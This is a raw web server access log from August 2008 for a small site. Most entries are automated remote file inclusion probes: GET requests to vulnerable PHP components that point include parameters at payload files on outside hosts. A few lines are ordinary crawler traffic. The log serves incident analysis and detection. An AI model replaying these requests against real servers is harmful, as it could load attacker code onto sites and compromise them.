74.52.66.242 - - [21/Aug/2008:09:30:52 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:30:52 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:30:53 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.812" "www.dmulk.com"
75.125.40.130 - - [21/Aug/2008:09:30:54 -0700] "GET /logs/access_080319.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.rocks-guild.com/raid//templates_c/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.125.40.130 - - [21/Aug/2008:09:30:54 -0700] "GET /logs/access_080315.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.rocks-guild.com/raid//templates_c/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.125.40.130 - - [21/Aug/2008:09:30:54 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.rocks-guild.com/raid//templates_c/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.125.40.130 - - [21/Aug/2008:09:30:54 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.rocks-guild.com/raid//templates_c/poiid.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.811" "www.dmulk.com"
217.20.175.69 - - [21/Aug/2008:09:31:19 -0700] "GET /logs/access_080218.log///vwar/backup/errors.php?error=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.27.247 - - [21/Aug/2008:09:31:56 -0700] "GET /logs/access_080720.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.27.247 - - [21/Aug/2008:09:31:56 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.27.247 - - [21/Aug/2008:09:31:56 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.241.162 - - [21/Aug/2008:09:32:00 -0700] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=%22Poweredhttp://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
67.19.241.162 - - [21/Aug/2008:09:32:00 -0700] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=%22Poweredhttp://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:32:13 -0700] "GET /logs/access_080309.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/sak4w/rfi/aa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.111.176.122 - - [21/Aug/2008:09:32:13 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:32:19 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:32:25 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:32:26 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.66.242 - - [21/Aug/2008:09:32:31 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.111.176.122 - - [21/Aug/2008:09:32:41 -0700] "GET //components/errors.php?error=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.70.15 - - [21/Aug/2008:09:33:54 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://cherrystreetvillage.org/components/com_jcalpro/lib/idpula.txt?? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
69.94.70.15 - - [21/Aug/2008:09:33:54 -0700] "GET /logs/access_080812.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://cherrystreetvillage.org/components/com_jcalpro/lib/idpula.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
69.94.70.15 - - [21/Aug/2008:09:33:55 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://cherrystreetvillage.org/components/com_jcalpro/lib/idpula.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
69.94.70.15 - - [21/Aug/2008:09:33:55 -0700] "GET /logs/access_080207.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://cherrystreetvillage.org/components/com_jcalpro/lib/idpula.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
195.56.111.194 - - [21/Aug/2008:09:33:59 -0700] "GET /logs//Ex/modules/threadstop/threadstop.php?http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.56.111.194 - - [21/Aug/2008:09:33:59 -0700] "GET /logs/access_080605.log//Ex/modules/threadstop/threadstop.php?http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.56.111.194 - - [21/Aug/2008:09:33:59 -0700] "GET //Ex/modules/threadstop/threadstop.php?http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.79.182.204 - - [21/Aug/2008:09:34:08 -0700] "GET /logs/access_080720.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.79.182.204 - - [21/Aug/2008:09:34:08 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.79.182.204 - - [21/Aug/2008:09:34:08 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.88.11 - - [21/Aug/2008:09:34:17 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://elpac.edu.mx/components/com_extcalendar/s.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
85.214.88.11 - - [21/Aug/2008:09:34:17 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://elpac.edu.mx/components/com_extcalendar/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
85.214.88.11 - - [21/Aug/2008:09:34:18 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://elpac.edu.mx/components/com_extcalendar/s.txt??? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
85.214.88.11 - - [21/Aug/2008:09:34:18 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://elpac.edu.mx/components/com_extcalendar/test.txt??? HTTP/1.1" 200 50 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
74.6.8.104 - - [21/Aug/2008:09:34:55 -0700] "GET /blog/index.php/2008/06/ HTTP/1.0" 200 10233 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
66.90.73.113 - - [21/Aug/2008:09:34:57 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=%20http://h1.ripway.com/rombongan/pid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
80.67.19.125 - - [21/Aug/2008:09:35:32 -0700] "GET /logs/access_080209.log//squirrelcart/cart_content.php?cart_isp_root=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.79.182.204 - - [21/Aug/2008:09:36:34 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.79.182.204 - - [21/Aug/2008:09:36:34 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.19.125 - - [21/Aug/2008:09:36:51 -0700] "GET /logs/access_080406.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.125 - - [21/Aug/2008:09:36:52 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.125 - - [21/Aug/2008:09:36:52 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.90.73.113 - - [21/Aug/2008:09:37:02 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=%20http://h1.ripway.com/rombongan/pid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
199.4.155.10 - - [21/Aug/2008:09:37:02 -0700] "GET /logs/access_080321.log HTTP/1.1" 200 196608 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit (KHTML, like Gecko)" "www.dmulk.com"
66.90.73.113 - - [21/Aug/2008:09:37:02 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=%20http://h1.ripway.com/rombongan/pid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
217.79.182.204 - - [21/Aug/2008:09:37:10 -0700] "GET /logs/access_080703.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.191 - - [21/Aug/2008:09:37:42 -0700] "GET /logs/access_080725.log//include/admin.lib.inc.php?site_path=http://www.confesercentilucca.it/rose/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:09:38:18 -0700] "GET /logs/access_080530.log%20//include/admin.lib.inc.php?site_path=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:09:38:18 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.130.79.130 - - [21/Aug/2008:09:38:20 -0700] "GET /logs/access_080115.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [21/Aug/2008:09:38:20 -0700] "GET /logs/access_080525.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [21/Aug/2008:09:38:20 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [21/Aug/2008:09:38:20 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.129.97.30 - - [21/Aug/2008:09:38:21 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.saren-first.com/images/n.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.222.30.248 - - [21/Aug/2008:09:38:23 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
83.222.30.248 - - [21/Aug/2008:09:38:23 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
83.222.30.248 - - [21/Aug/2008:09:38:23 -0700] "GET /logs/access_080616.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
88.80.198.178 - - [21/Aug/2008:09:38:34 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.80.198.178 - - [21/Aug/2008:09:38:35 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.80.198.178 - - [21/Aug/2008:09:38:35 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/readme.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.222.30.248 - - [21/Aug/2008:09:38:45 -0700] "GET /logs/access_080616.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
83.222.30.248 - - [21/Aug/2008:09:38:47 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
83.222.30.248 - - [21/Aug/2008:09:38:48 -0700] "GET /logs/access_080616.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
83.222.30.248 - - [21/Aug/2008:09:38:48 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
83.222.30.248 - - [21/Aug/2008:09:38:48 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
83.222.30.248 - - [21/Aug/2008:09:38:48 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
83.222.30.248 - - [21/Aug/2008:09:38:53 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
83.222.30.248 - - [21/Aug/2008:09:38:54 -0700] "GET /logs/access_080616.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
83.222.30.248 - - [21/Aug/2008:09:38:54 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
165.166.201.202 - - [21/Aug/2008:09:40:11 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [21/Aug/2008:09:40:17 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.143.183 - - [21/Aug/2008:09:40:17 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.83.209.18 - - [21/Aug/2008:09:40:25 -0700] "GET /logs/access_080525.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.83.209.18 - - [21/Aug/2008:09:40:25 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.83.209.18 - - [21/Aug/2008:09:40:25 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
190.83.18.253 - - [21/Aug/2008:09:40:25 -0700] "GET /logs/access_080330.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.83.209.18 - - [21/Aug/2008:09:40:25 -0700] "GET /logs/access_080115.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.79.182.204 - - [21/Aug/2008:09:40:44 -0700] "GET /logs/access_080708.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.19.125 - - [21/Aug/2008:09:40:45 -0700] "GET /logs/access_080312.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cookaround.com/yabbse1/impex/log/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
119.63.193.186 - - [21/Aug/2008:09:40:54 -0700] "HEAD /retreat1/webcam/retreat1_00429.jpg HTTP/1.1" 200 0 "-" "BaiduImagespider+(+http://help.baidu.jp/system/05.html)" "www.dmulk.com"
119.63.193.186 - - [21/Aug/2008:09:40:54 -0700] "GET /retreat1/webcam/retreat1_00429.jpg HTTP/1.1" 200 43917 "-" "BaiduImagespider+(+http://help.baidu.jp/system/05.html)" "www.dmulk.com"
69.89.27.247 - - [21/Aug/2008:09:41:55 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.27.247 - - [21/Aug/2008:09:41:55 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.books4internet.com/MyMail/admin/cache.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
190.30.164.230 - - [21/Aug/2008:09:42:02 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.30.164.230 - - [21/Aug/2008:09:42:06 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.30.164.230 - - [21/Aug/2008:09:42:06 -0700] "GET /logs/access_080726.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.117.239.114 - - [21/Aug/2008:09:42:08 -0700] "GET /logs/access_080722.log//include/admin.lib.inc.php?site_path=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [21/Aug/2008:09:42:09 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [21/Aug/2008:09:42:10 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [21/Aug/2008:09:42:10 -0700] "GET /logs/access_080722.log//include/admin.lib.inc.php?site_path=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [21/Aug/2008:09:42:14 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [21/Aug/2008:09:42:16 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.confesercentilucca.it/rose/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.130.79.130 - - [21/Aug/2008:09:42:16 -0700] "GET /logs/access_080808.log//bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [21/Aug/2008:09:42:16 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [21/Aug/2008:09:42:16 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [21/Aug/2008:09:42:16 -0700] "GET /logs/access_080803.log//bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.83.209.18 - - [21/Aug/2008:09:42:17 -0700] "GET /logs/access_080808.log//bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.83.209.18 - - [21/Aug/2008:09:42:17 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.83.209.18 - - [21/Aug/2008:09:42:17 -0700] "GET //bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.67.20.130 - - [21/Aug/2008:09:42:28 -0700] "GET /logs/access_080808.log///squirrelcart/cart_content.php?cart_isp_root=http://www.confesercentilucca.it/rose/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
